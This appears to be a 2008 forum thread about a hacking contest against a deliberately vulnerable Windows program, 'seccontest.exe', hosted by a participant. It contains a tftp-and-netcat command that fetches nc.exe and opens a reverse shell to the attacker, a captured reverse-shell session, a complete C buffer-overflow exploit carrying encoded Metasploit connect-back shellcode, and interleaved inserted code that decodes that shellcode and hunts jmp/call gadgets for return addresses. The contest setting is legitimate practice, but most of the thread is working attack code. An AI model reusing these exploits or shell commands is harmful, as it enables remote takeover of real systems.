Security practice (contest)


Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    No, the server is up till Saturday.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Great! I'll still have a go before then.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Yup, give it a lash.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Is the port still open?
    I'm in an internet cafe, maybe they have it blocked here.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    It should be, but it's conceited that's hosting it.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Ok, I can't access it from here anyway..

    Tested my code on winxp sp3 32-bit + winxp 64-bit, and both worked fine; I'm guessing it will work fine on win2k sp4 too..

    Couldn't test this on win2k, had an old laptop with it installed which died on me during the week.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    If you're doing the same method as me, then your return address is all that needs to be changed for win2k sp4.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Just connected from a different place, can you check the administrator's desktop? Because the assembly code only executes a command creating sec_practice.txt.
    if you're doing the same method as me, then your return address is all that needs to be changed for win2k sp4

    I'm using an address that *should* be the same on all operating systems (except the code uses the PEB, so obviously won't work on 9x/NT) but I still haven't tested + confirmed it to work on win2k.

    Exploit sent, so let me know if it worked or not.. if not, that's all I'm doing.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Hi Joe,

    I just had a look at the server and nothing new is on the desktop unfortunately.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Hmm, well what time is the server being taken down?
    I might still have time to re-install win2k on another computer..


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Plenty of time, Joe. Sometime tomorrow evening.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    I just tested my code on win2k sp4 with the same address used on win xp 32+64 bit versions - it worked fine... don't know what the problem is. Maybe I'll run it again.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I'll keep an eye out. Hope it works.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    It's down now.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    It was the speed increase tonight from Eircom.
    Sorry about that. :pac:


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    The code I sent is working but for some reason interrupted.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Wrote another bit of code that spawned a reverse shell, tested on win2k sp4/winxp sp2/sp3 32 + sp1 64 bit... all worked fine, multiple times.

    Tried on conceited.homeunix.org - fails, a connection is made to the computer I'm on, but it immediately disconnects; same thing happened with the first code that executed a command.

    The funny thing is, the connection is made some 5-6 seconds after the exploit is sent.. why? Would like to know..

    So, I install FireDaemon thinking it's something to do with that.
    Run it again on all systems, my codes work fine, so what's the problem?

    All the codes I wrote and tested locally worked fine, it's only when trying against conceited.homeunix.org that the connection gets dropped for some bizarre reason, in all situations.. I've no idea why.

    Damo, can you detail how you exploited this? I can't finish this challenge, not sure anyone else will today if the server comes down.

    tbh, I would try again, but not writing any more code, because it always worked for me locally, unless it's a problem with router configuration.. I don't know.

    EDIT:
    I just got a chance to test my code on Vista and it worked.

    So that's:

    WinXP SP2 32-bit - working
    WinXP SP3 32-bit - working
    Win2K SP4 32-bit - working
    WinXP SP1 64-bit - working
    Vista SP1 32-bit - working

    All using the same return address..

    but just not working on your server, conceited! :(


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Hey Joe,

    There are multiple files on the desktop. The router is fine, nothing has changed. The files are all called TFTP1396, tft91393; there are 6 in total.
    They start with the bytes MZ and have .rdata, .text so it's some sort of exe.

    Let me know if you need me to send one of them files.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    No, these are just error logs from tftp.
    The first code I wrote executed any command.. what I wanted was an easy way to get a reverse shell, so the command was:
    cmd /c tftp -i my_host_ip get nc.exe c:\nc.exe && cmd /c C:\nc.exe my_host_ip 80 -ecmd
    

    on my computer:
    nc -vLp80
    

    and also a tftp server waiting for the connection..
    The connection happens, but it's dropped straight away..


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Do you want me to send one of them over?
    I've never seen an error log starting with bytes MZ before.
    Perhaps it's your side that's the problem?

    Your code is too complicated for me. I've never seen anything load Windows APIs like that, if that's what you're doing.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Sure, zip/email it to me <snip>
    I'll send you the program that I'm using to get the reverse shell locally, you can test yourself to see if it works or not.

    Possibly it is an error on my side with router configuration.. but the NAT entry seemed to be working fine.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    TFTP is UDP, maybe that's the problem. I'll send on the file.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    tftp is udp maybe thats the problem.

    It worked for me locally, remotely.. no idea what goes wrong.
    I can see the connection made to the tftp server, then it just says that the peer dropped the connection. *shrug*

    That's even when seccontest.exe is sleeping for 65 seconds :D


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Tell me what port to open for tftp and I'll try that. That has to be it, as you said the error logs are left on the desktop where your code is running.
    :pac: That's the problem alright, has to be.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    I sent the email. Sleeping for 65 seconds, jesus what are ya doing that for :)


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    You don't have to open any ports for it.
    When I send the command, the buffer over-run in seccontest.exe executes the command locally.

    So tftp connects to my IP address running the tftp server.. this does happen, but for some reason the connection is immediately dropped.

    In the case of the reverse shell, same problem: your server connects to my IP address, but immediately drops the connection.

    Maybe it is the router at my end, don't know.. it's strange :)


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    The files you found are temporarily created by tftp when downloading a file, but of course only when the transfer isn't completed.. I said "error logs" but they're the result of a transfer error.

    Is it possible you're running some anti-virus scanner or host intrusion protection software that might close the connection if it detects something malicious?


  • Closed Accounts Posts: 891 ✭✭✭conceited


    You're right. I wasn't thinking about the local part. Pity Damo isn't here to have a chat with you. Everything on my side looks ok.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Correction! Just had somebody else online try it using the program I wrote; seems that it works! :D
    C:\PROVA>nc -vLp80
    listening on [any] 80 ...
    connect to [192.168.1.2] from 86-41-130-98.b-ras1.chf.cork.eircom.net [86.41.13
    .98] 52864
    
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.
    
    C:\Documents and Settings\damos challenge\Desktop>
    C:\Documents and Settings\damos challenge\Desktop>
    
    
    C:\Documents and Settings\damos challenge\Desktop>
    
    C:\Documents and Settings\damos challenge\Desktop>
    C:\Documents and Settings\damos challenge\Desktop>DIR
    DIR
    Volume in drive C has no label.
    Volume Serial Number is 4400-546B
    
    Directory of C:\Documents and Settings\damos challenge\Desktop
    
    07/26/2008  01:40p      <DIR>          .
    07/26/2008  01:40p      <DIR>          ..
    07/19/2008  07:28p               1,251 cmd.lnk
    07/20/2008  02:16p                   8 Damo.txt
    07/19/2008  07:52p                 675 FireDaemon Pro Service Manager.lnk
    07/19/2008  03:33p                 995 intro.txt
    07/19/2008  03:07p              12,288 seccontest.exe
    07/26/2008  06:54a                 512 TFTP1184
    07/26/2008  06:56a                 512 TFTP1232
    07/26/2008  05:17a                 512 TFTP1336
    07/26/2008  05:12a                 512 TFTP1396
    07/26/2008  06:57a                 512 TFTP1608
    07/19/2008  07:31p         135,477,136 W2KSP4_EN.EXE
                 11 File(s)    135,494,913 bytes
                  2 Dir(s)  133,264,781,312 bytes free
    
    C:\Documents and Settings\damos challenge\Desktop>cat
    cat
    'cat' is not recognized as an internal or external command,
    operable program or batch file.
    
    C:\Documents and Settings\damos challenge\Desktop>type damo.txt
    type damo.txt
    Yo :)
    
    C:\Documents and Settings\damos challenge\Desktop>exit
    exit
    listening on [192.168.1.2] 80 ...
    

    Must be a problem with the router or virus scanner at my end...


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Ah, that's the job, Joe. You'd have had it finished ages ago only for that. Must have been very irritating, I'd say. Glad you got confirmation. :)


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    LOL it was a fckin nightmare.. :D I still can't run it from here, the only internet I have at the moment is actually a 3G phone and there's no way to get a reverse shell through it.. so I'm just happy it worked after all that crap.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    3g lovely :)
    Glad you got it anyway .


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sorry for the delay in replies. Well done Average Joe. Also, if you're using a 3G phone, chances are you don't have a unique IP to connect back to, so you can't have an incoming connection on a socket, especially on 3 IRL; they have about 4 IPs shared for all their internet users.


    Since it's Saturday, my code (C) is:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include "winsock2.h"
    #pragma comment(lib, "ws2_32.lib")   /* MSVC; with Dev-C++ add libwsock32.a to the project instead */
    
    /* Metasploit win32_reverse shellcode, XOR-encoded: the first 24 bytes are the
       decoder stub (dword key 0x2D4AFDCF, applied from offset 24 onwards). The
       connect-back IP and port live at offsets 184 and 190 and are written in,
       already XORed, by sortshellcode(). Contains no NUL bytes, so strlen() is safe. */
    char shellcode[] =
    "\x2b\xc9\x83\xe9\xb8\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xcf"
    "\xfd\x4a\x2d\x83\xee\xfc\xe2\xf4\x33\x97\xa1\x60\x27\x04\xb5\xd2"
    "\x30\x9d\xc1\x41\xeb\xd9\xc1\x68\xf3\x76\x36\x28\xb7\xfc\xa5\xa6"
    "\x80\xe5\xc1\x72\xef\xfc\xa1\x64\x44\xc9\xc1\x2c\x21\xcc\x8a\xb4"
    "\x63\x79\x8a\x59\xc8\x3c\x80\x20\xce\x3f\xa1\xd9\xf4\xa9\x6e\x05"
    "\xba\x18\xc1\x72\xeb\xfc\xa1\x4b\x44\xf1\x01\xa6\x90\xe1\x4b\xc6"
    "\xcc\xd1\xc1\xa4\xa3\xd9\x56\x4c\x0c\xcc\x91\x49\x44\xbe\x7a\xa6"
    "\x8f\xf1\xc1\x5d\xd3\x50\xc1\x6d\xc7\xa3\x22\xa3\x81\xf3\xa6\x7d"
    "\x30\x2b\x2c\x7e\xa9\x95\x79\x1f\xa7\x8a\x39\x1f\x90\xa9\xb5\xfd"
    "\xa7\x36\xa7\xd1\xf4\xad\xb5\xfb\x90\x74\xaf\x4b\x4e\x10\x42\x2f"
    "\x9a\x97\x48\xd2\x1f\x95\x93\x24\x3a\x50\x1d\xd2\x19\xae\x19\x7e"
    "\x9c\xbe\x19\x6e\x9c\x02\x9a\x45"
    "\xff\xff\xff\xff" // IP (offset 184)
    "\xa9\x95"
    "\xff\xff" // PORT (offset 190)
    "\xa9\xae\xc3\xcc\x5a\x95\xa6\xd4\x65\x9d\x1d\xd2\x19\x97\x5a\x7c"
    "\x9a\x02\x9a\x4b\xa5\x99\x2c\x45\xac\x90\x20\x7d\x96\xd4\x86\xa4"
    "\x28\x97\x0e\xa4\x2d\xcc\x8a\xde\x65\x68\xc3\xd0\x31\xbf\x67\xd3"
    "\x8d\xd1\xc7\x57\xf7\x56\xe1\x86\xa7\x8f\xb4\x9e\xd9\x02\x3f\x05"
    "\x30\x2b\x11\x7a\x9d\xac\x1b\x7c\xa5\xfc\x1b\x7c\x9a\xac\xb5\xfd"
    "\xa7\x50\x93\x28\x01\xae\xb5\xfb\xa5\x02\xb5\x1a\x30\x2d\x22\xca"
    "\xb6\x3b\x33\xd2\xba\xf9\xb5\xfb\x30\x8a\xb6\xd2\x1f\x95\xba\xa7"
    "\xcb\xa2\x19\xd2\x19\x02\x9a\x2d";
    
    char jmp2esp[] = "\x29\x4c\xe1\x77"; /* Win 2k SP4 - user32.dll - jmp esp */
    /* char jmp2esp[] = "\xbb\xed\x4f\x7c"; */ /* alternative Win 2k SP4 address */
    int sortshellcode(char *port, char *ip);
    
    int main(int argc, char **argv) {
        WSADATA wsaData;
        SOCKET m_socket;
        struct sockaddr_in service;
        char payload[1024];
        int iResult;
    
        if (argc < 5) {   /* all four arguments are used below */
            printf("Usage: %s victim-ip victim-port your-ip your-port\n", argv[0]);
            exit(1);
        }
    
        // Initialize Winsock.
        iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
        if ( iResult != NO_ERROR ) {
            printf("Error at WSAStartup()\n");
            return 1;
        }
    
        // Create a socket.
        m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
        if ( m_socket == INVALID_SOCKET ) {
            printf( "Error at socket(): %d\n", WSAGetLastError() );
            WSACleanup();
            return 1;
        }
    
        // Fill in the victim's address and connect.
        memset(&service, 0, sizeof(service));
        service.sin_family = AF_INET;
        service.sin_addr.s_addr = inet_addr(argv[1]);
        service.sin_port = htons(atoi(argv[2]));
    
        if ( connect( m_socket, (SOCKADDR *) &service, sizeof(service) ) == SOCKET_ERROR ) {
            printf( "connect() failed.\n" );
            closesocket(m_socket);
            WSACleanup();
            return 1;
        }
    
        // Patch our IP and port into the encoded shellcode.
        sortshellcode(argv[4], argv[3]);
    
        // Build the payload: filler up to the saved return address at offset 524,
        // the jmp esp address, a short NOP sled, then the shellcode.
        memset(payload, 0, sizeof(payload));                  // zeroed so strlen() stops after the shellcode
        memset(payload, 0x41, 528);                           // fill with A
        memcpy(payload+524, jmp2esp, 4);                      // jmp esp overwrites the saved EIP
        memset(payload+529, 0x90, 10);                        // nop sledge (byte 528 stays 0x41 = inc ecx, harmless)
        memcpy(payload+539, shellcode, strlen(shellcode));    // our shell code
    
        // Send the payload; the shellcode connects back to your-ip:your-port.
        send( m_socket, payload, strlen(payload), 0 );
        closesocket(m_socket);
        WSACleanup();
        return 0;
    }
    
    /* The decoder XORs the body with 0x2D4AFDCF four bytes at a time starting at
       offset 24, so the IP (dword-aligned at 184) is XORed with the whole key and
       the port (offset 190, upper half of the dword at 188) with 0x2D4A. */
    int sortshellcode(char *port, char *ip)
    {
        unsigned long xorip;
        unsigned short xorport;
        xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;          /* inet_addr already gives network byte order */
        xorport = htons(atoi( port ))^(unsigned short)0x2D4A;
        memcpy ( &shellcode[184], &xorip, 4);
        memcpy ( &shellcode[190], &xorport, 2);
        return 0;
    }
    

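The XOR patch in sortshellcode() above depends on three numbers that are only right for this particular encoded blob: the key, the dword alignment of offset 184, and the half-key 0x2D4A for the port at 190. The following C program is an added example, not part of Damo's post or of seccontest.exe: it reads those numbers out of the decoder stub itself, patches in an IP and port the same way, emulates the decoder loop, and then checks that the decoded shellcode really contains `push imm32 / push word imm16` with the values given before anything is sent. The encoded bytes are the ones from the post; the address 192.168.1.2:4444 is a constructed test value.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Damo's encoded shellcode (from the post above): 24-byte XOR decoder stub,
   then 72 dwords of win32_reverse. 0xff at 184..187 and 190..191 are the
   IP and port slots that sortshellcode() fills in. */
static const uint8_t enc_template[312] = {
    0x2b,0xc9,0x83,0xe9,0xb8,0xe8,0xff,0xff,0xff,0xff,0xc0,0x5e,0x81,0x76,0x0e,0xcf,
    0xfd,0x4a,0x2d,0x83,0xee,0xfc,0xe2,0xf4,0x33,0x97,0xa1,0x60,0x27,0x04,0xb5,0xd2,
    0x30,0x9d,0xc1,0x41,0xeb,0xd9,0xc1,0x68,0xf3,0x76,0x36,0x28,0xb7,0xfc,0xa5,0xa6,
    0x80,0xe5,0xc1,0x72,0xef,0xfc,0xa1,0x64,0x44,0xc9,0xc1,0x2c,0x21,0xcc,0x8a,0xb4,
    0x63,0x79,0x8a,0x59,0xc8,0x3c,0x80,0x20,0xce,0x3f,0xa1,0xd9,0xf4,0xa9,0x6e,0x05,
    0xba,0x18,0xc1,0x72,0xeb,0xfc,0xa1,0x4b,0x44,0xf1,0x01,0xa6,0x90,0xe1,0x4b,0xc6,
    0xcc,0xd1,0xc1,0xa4,0xa3,0xd9,0x56,0x4c,0x0c,0xcc,0x91,0x49,0x44,0xbe,0x7a,0xa6,
    0x8f,0xf1,0xc1,0x5d,0xd3,0x50,0xc1,0x6d,0xc7,0xa3,0x22,0xa3,0x81,0xf3,0xa6,0x7d,
    0x30,0x2b,0x2c,0x7e,0xa9,0x95,0x79,0x1f,0xa7,0x8a,0x39,0x1f,0x90,0xa9,0xb5,0xfd,
    0xa7,0x36,0xa7,0xd1,0xf4,0xad,0xb5,0xfb,0x90,0x74,0xaf,0x4b,0x4e,0x10,0x42,0x2f,
    0x9a,0x97,0x48,0xd2,0x1f,0x95,0x93,0x24,0x3a,0x50,0x1d,0xd2,0x19,0xae,0x19,0x7e,
    0x9c,0xbe,0x19,0x6e,0x9c,0x02,0x9a,0x45,0xff,0xff,0xff,0xff,0xa9,0x95,0xff,0xff,
    0xa9,0xae,0xc3,0xcc,0x5a,0x95,0xa6,0xd4,0x65,0x9d,0x1d,0xd2,0x19,0x97,0x5a,0x7c,
    0x9a,0x02,0x9a,0x4b,0xa5,0x99,0x2c,0x45,0xac,0x90,0x20,0x7d,0x96,0xd4,0x86,0xa4,
    0x28,0x97,0x0e,0xa4,0x2d,0xcc,0x8a,0xde,0x65,0x68,0xc3,0xd0,0x31,0xbf,0x67,0xd3,
    0x8d,0xd1,0xc7,0x57,0xf7,0x56,0xe1,0x86,0xa7,0x8f,0xb4,0x9e,0xd9,0x02,0x3f,0x05,
    0x30,0x2b,0x11,0x7a,0x9d,0xac,0x1b,0x7c,0xa5,0xfc,0x1b,0x7c,0x9a,0xac,0xb5,0xfd,
    0xa7,0x50,0x93,0x28,0x01,0xae,0xb5,0xfb,0xa5,0x02,0xb5,0x1a,0x30,0x2d,0x22,0xca,
    0xb6,0x3b,0x33,0xd2,0xba,0xf9,0xb5,0xfb,0x30,0x8a,0xb6,0xd2,0x1f,0x95,0xba,0xa7,
    0xcb,0xa2,0x19,0xd2,0x19,0x02,0x9a,0x2d
};

typedef struct { size_t start, ndwords; uint32_t key; } pex_stub;

/* Pull key, dword count and start offset out of the stub instead of hard-coding them:
   2b c9 | 83 e9 XX (ecx = -XX) | e8 ff ff ff ff | ff c0 | 5e (esi = offset 10)
   | 81 76 DD KKKKKKKK (xor dword [esi+DD],key) | 83 ee fc | e2 f4 (loop) */
int parse_pex_stub(const uint8_t *enc, size_t n, pex_stub *s)
{
    static const uint8_t a[4] = {0x2b,0xc9,0x83,0xe9};
    static const uint8_t b[9] = {0xe8,0xff,0xff,0xff,0xff,0xc0,0x5e,0x81,0x76};
    static const uint8_t c[5] = {0x83,0xee,0xfc,0xe2,0xf4};
    if (n < 24 || memcmp(enc, a, 4) || memcmp(enc + 5, b, 9) || memcmp(enc + 19, c, 5)) return 0;
    s->ndwords = (uint8_t)(0 - enc[4]);          /* imm8 is negative: sub ecx,-0x48 */
    s->start = 10 + enc[14];                     /* pop esi leaves offset 10, plus the disp8 */
    s->key = (uint32_t)enc[15] | (uint32_t)enc[16] << 8 | (uint32_t)enc[17] << 16 | (uint32_t)enc[18] << 24;
    return s->start + 4 * s->ndwords <= n;
}

/* Key byte the decoder XORs into position pos (dword-wise, little-endian). */
static uint8_t key_byte(const pex_stub *s, size_t pos) { return (uint8_t)(s->key >> (8 * ((pos - s->start) % 4))); }

/* Emulate the decoder loop on a copy; returns the decoded length. */
size_t pex_decode(const uint8_t *enc, size_t n, const pex_stub *s, uint8_t *out)
{
    size_t i, end = s->start + 4 * s->ndwords;
    memcpy(out, enc, n);
    for (i = s->start; i < end; i++) out[i] ^= key_byte(s, i);
    return end;
}

/* sortshellcode() generalised: pre-XOR val so it decodes to itself at off,
   whatever off's alignment relative to the key. */
void pex_patch(uint8_t *enc, const pex_stub *s, size_t off, const uint8_t *val, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++) enc[off + i] = val[i] ^ key_byte(s, off + i);
}

/* Find "push imm32 / push word imm16 / push bx" in the decoded body and
   report the connect-back address the shellcode will actually use. */
int find_connect_back(const uint8_t *dec, size_t n, uint8_t ip[4], uint16_t *port)
{
    size_t i;
    for (i = 0; i + 11 <= n; i++) {
        if (dec[i] != 0x68 || dec[i+5] != 0x66 || dec[i+6] != 0x68 || dec[i+9] != 0x66 || dec[i+10] != 0x53) continue;
        memcpy(ip, dec + i + 1, 4);
        *port = (uint16_t)(dec[i+7] << 8 | dec[i+8]);   /* stored in network order */
        return 1;
    }
    return 0;
}

/* Patch in 192.168.1.2:4444 (constructed values), decode, verify; 1 = ok. */
int self_check(void)
{
    static const uint8_t my_ip[4] = {192,168,1,2}, my_port[2] = {0x11,0x5c};
    uint8_t enc[312], dec[312], ip[4];
    uint16_t port;
    pex_stub s;
    memcpy(enc, enc_template, sizeof enc);
    if (!parse_pex_stub(enc, sizeof enc, &s) || s.key != 0x2D4AFDCFu || s.ndwords != 72 || s.start != 24) return 0;
    pex_patch(enc, &s, 184, my_ip, 4);
    pex_patch(enc, &s, 190, my_port, 2);
    if (pex_decode(enc, sizeof enc, &s, dec) != 312) return 0;
    if (dec[24] != 0xfc || dec[65] != 0x84 || dec[66] != 0xc0) return 0;   /* cld at the start, test al,al in the API hash loop */
    if (!find_connect_back(dec, sizeof dec, ip, &port)) return 0;
    return memcmp(ip, my_ip, 4) == 0 && port == 4444;
}

int main(void)
{
    printf("decoder emulation: %s\n", self_check() ? "ok, shellcode will connect back to 192.168.1.2:4444" : "FAILED");
    return 0;
}
```

The push sequence it looks for (68 ip, 66 68 port, 66 53) is how the unencoded win32_reverse shellcode builds its sockaddr, so the same search also applies to an unencoded copy: there the patch is a plain memcpy and the check is just that the bytes land one past the push opcode, not on it.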

  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    Cheers man, well done to yourself. Not gonna add anything to that except to say that there was a universal return address for all OSs + SPs.
    Here are copied comments from the source of the code I wrote.

    [php]
    #define RETURN_ADDR 0x00401ACB

    explanation of this address..
    since strcpy() returns a pointer to the destination buffer in eax, all
    we need to do is jmp eax or call eax and the exploit will in theory, work
    on any operating system + service pack.

    in the ___chkstk routine which is (ironically) meant to check the stack
    for malicious modification, the following bit of code is all we need:

    .text:00401ABD done:
    .text:00401ABD sub ecx, eax
    .text:00401ABF or dword ptr [ecx], 0
    .text:00401AC2 mov eax, esp
    .text:00401AC4 mov esp, ecx
    .text:00401AC6 mov ecx, [eax]
    .text:00401AC8 mov eax, [eax+4]
    .text:00401ACB jmp eax ; <- universal address

    so now the exploit should work on any system, since EXE files don't usually
    contain relocation information, the address won't change.

    bear in mind for the current asm_code, it requires PEB to lookup API, so
    in this case, only win2k/win2k3/xp would work.

    [/php]

    i'll upload the asm codes i wrote for this later.
    next contest please :)

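As an added example (mine, not from the post or from seccontest.exe), a small gadget scan in C that turns the observation above into a check you can run over any .text bytes pulled from a target: it finds the two-byte jmp/call eax and jmp/call esp encodings, reports them at their mapped addresses, and flags addresses that contain a 0x00 byte. The __chkstk bytes are assembled from the listing above (first instruction at 0x00401ABD) and stand in for a real dump; the second blob and its base are invented so that a jmp esp lands at the user32.dll address Damo used, and are not bytes from user32.dll.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed stand-in for the tail of __chkstk, assembled from the listing
   in the post above (done: at 0x00401ABD). Not a dump of the binary. */
static const uint8_t chkstk_tail[] = {
    0x2b,0xc8,        /* 00401ABD  sub ecx,eax */
    0x83,0x09,0x00,   /* 00401ABF  or dword [ecx],0 */
    0x8b,0xc4,        /* 00401AC2  mov eax,esp */
    0x8b,0xe1,        /* 00401AC4  mov esp,ecx */
    0x8b,0x08,        /* 00401AC6  mov ecx,[eax] */
    0x8b,0x40,0x04,   /* 00401AC8  mov eax,[eax+4] */
    0xff,0xe0,        /* 00401ACB  jmp eax */
};
#define CHKSTK_BASE 0x00401ABDu

/* Constructed filler with a jmp esp placed so that it maps to 0x77E14C29, the
   user32.dll address in Damo's exploit; an assumption for the demo only. */
static const uint8_t fake_user32[] = { 0x90, 0x90, 0xff, 0xe4, 0xc3 };
#define FAKE_USER32_BASE 0x77E14C27u

typedef struct { uint32_t addr; const char *insn; int has_nul; } gadget;

static const struct { uint8_t op, modrm; const char *insn; } wanted[] = {
    { 0xff, 0xe0, "jmp eax" }, { 0xff, 0xd0, "call eax" },   /* eax = strcpy()'s return value */
    { 0xff, 0xe4, "jmp esp" }, { 0xff, 0xd4, "call esp" },   /* esp = just past the saved eip */
};

/* Scan code bytes mapped at base for the register jumps above. has_nul marks
   addresses containing a 0x00 byte: usable only as the last thing a
   strcpy()-style copy writes, because the copy stops at that byte. */
size_t find_gadgets(const uint8_t *code, size_t len, uint32_t base, gadget *out, size_t max)
{
    size_t i, k, n = 0;
    for (i = 0; i + 1 < len && n < max; i++) {
        for (k = 0; k < sizeof wanted / sizeof wanted[0]; k++) {
            if (code[i] != wanted[k].op || code[i + 1] != wanted[k].modrm) continue;
            out[n].addr = base + (uint32_t)i;
            out[n].insn = wanted[k].insn;
            out[n].has_nul = (out[n].addr & 0xffu) == 0 || (out[n].addr & 0xff00u) == 0 ||
                             (out[n].addr & 0xff0000u) == 0 || (out[n].addr & 0xff000000u) == 0;
            n++;
        }
    }
    return n;
}

/* Runs the scan over both blobs; 1 when exactly the expected gadgets come out. */
int self_check(void)
{
    gadget g[4];
    size_t n = find_gadgets(chkstk_tail, sizeof chkstk_tail, CHKSTK_BASE, g, 4);
    if (n != 1 || g[0].addr != 0x00401ACBu || strcmp(g[0].insn, "jmp eax") || !g[0].has_nul) return 0;
    n = find_gadgets(fake_user32, sizeof fake_user32, FAKE_USER32_BASE, g, 4);
    if (n != 1 || g[0].addr != 0x77E14C29u || strcmp(g[0].insn, "jmp esp") || g[0].has_nul) return 0;
    return 1;
}

int main(void)
{
    gadget g[8];
    size_t i, n = find_gadgets(chkstk_tail, sizeof chkstk_tail, CHKSTK_BASE, g, 8);
    for (i = 0; i < n; i++)
        printf("%08x  %-8s  %s\n", (unsigned)g[i].addr, g[i].insn,
               g[i].has_nul ? "contains NUL: must be last in a strcpy overflow" : "NUL-free");
    return self_check() ? 0 : 1;
}
```

The NUL flag is the caveat that goes with 0x00401ACB: a strcpy()-driven overflow stops copying at the first zero byte, so an address whose top byte is 0x00 can only sit at the very end of the string, with strcpy's own terminator completing it. That fits the jmp eax plan, since eax points at the start of the destination buffer and the shellcode goes in front of the address rather than after it; the image-base address also only stays "universal" while the EXE carries no relocations and is loaded at its preferred base.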

  • Closed Accounts Posts: 891 ✭✭✭conceited


    Joe, I am having some trouble getting the size of a struc in NASM. In MASM you can use the sizeof keyword.
    Any ideas?


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    No, sorry mate..

    Working with NASM is hard work :) you could check out NASM32, which is sort of a project like MASM32, but I've not tried it out.

    Japheth has created some win32 include files you can use with MASM + his own JWASM, which is a fork of MASM (still in early stages); I find it much easier to write assembly using those files.

    Don't really use NASM; indeed it was used for this challenge, but only because MASM wouldn't generate a binary file.

    Don't mean to rant, but NASM is a bit crap in some ways.. just how it encodes immediate values/jump displacements.. all are 32-bits and you can't explicitly tell it not to use 32-bits.. and when using LEA this is an unavoidable issue.

    For example, in my first reverse connect asm code using MASM, I had:

    [php]
    mov dl,(@get_proc_address - @entrypoint)
    lea ebp,[esp + edx] ; load address of our GetProcAddress
    lea esi,[ebp + (@code_end - @get_proc_address)] ; load pointer to hashes
    lea edi,[ebp + (@cmd_string - @get_proc_address) + 3] ; load cmd string
    stosb
    [/php]

    but NASM was generating lots of null bytes + increasing the size, and I didn't have an encoder for it.. so it had to become:

    [php]
    mov dl, (@get_proc_address - @entry_point)
    lea ebp, [esp + edx]

    mov dl, (@code_end - @get_proc_address)
    mov esi, ebp
    add esi, edx

    mov dl, (@cmd_string - @get_proc_address) + 3
    mov edi, ebp
    add edi, edx
    stosb
    [/php]

    With push, you need to tell NASM it's a byte and with jumps a short.. etc, all this nonsense that most other assemblers simply do automatically for you.

    Also, in the latest version, it won't allow you to address segments, which might not seem useful to many, but you can control a lot in your code by being able to address FS, DS, ES explicitly.

    It's more hard work than it needs to be, so I'd recommend you check out MASM + Japheth's win32inc.. or if you want to stick with NASM, search online for the NASM32 package.


  • Registered Users Posts: 13 livewire2k


    Nice work Damo and Average Joe and conceited. Ok, I didn't get this challenge done; I spent about a year cracking programs so I should have been good with a debugger, but I have it all forgotten! Hey Damo, can you post a compiled version of your app and maybe a guide to how it works? I'm getting errors when I try to compile!

    Peace, Livewire, looking forward to the next challenge


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Sorry i have been really busy all week. I compiled with dev-cpp, start a new c project and add the library "libwsock32.a". Then compile the c source.


  • Closed Accounts Posts: 1,567 ✭✭✭Martyr


    I might try to write something over the weekend for the next contest if that's ok.

    It'll probably involve solving a puzzle first rather than finding a vulnerability/writing an exploit.

    Cryptography will be part of the puzzle, but it won't be so difficult you need a PhD in mathematics to solve it.


  • Closed Accounts Posts: 891 ✭✭✭conceited


    Here's my code.
    Finally got time today to finish it.
    Socket programming was tough enough, never did it before.
    Looking forward to your one, Joe.

    Thanks for the challenge Damo, I enjoyed that :)
    [PHP]
    ;Connection

    ; 1. Initialize WSA - WSAStartup().
    ; 2. Create a socket - socket().
    ; 3. Connect to the server - connect().
    ; 4. Send data - send().
    ; 5. Disconnect - closesocket().

    ;compile with:
    ; NASMW.EXE -fobj buff.asm
    ;link with:
    ; ALINK.EXE buff.obj -c -oPE -subsys console

    ;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^conceited@live.com

    %include "D:\programming\nasm\include\windows.inc"


    EXTERN __getmainargs
    IMPORT __getmainargs Msvcrt.dll
    EXTERN ExitProcess
    IMPORT ExitProcess kernel32.dll
    EXTERN printf
    IMPORT printf Msvcrt.dll
    EXTERN WSAStartup
    IMPORT WSAStartup Ws2_32.dll
    EXTERN WSAGetLastError
    IMPORT WSAGetLastError Ws2_32.dll
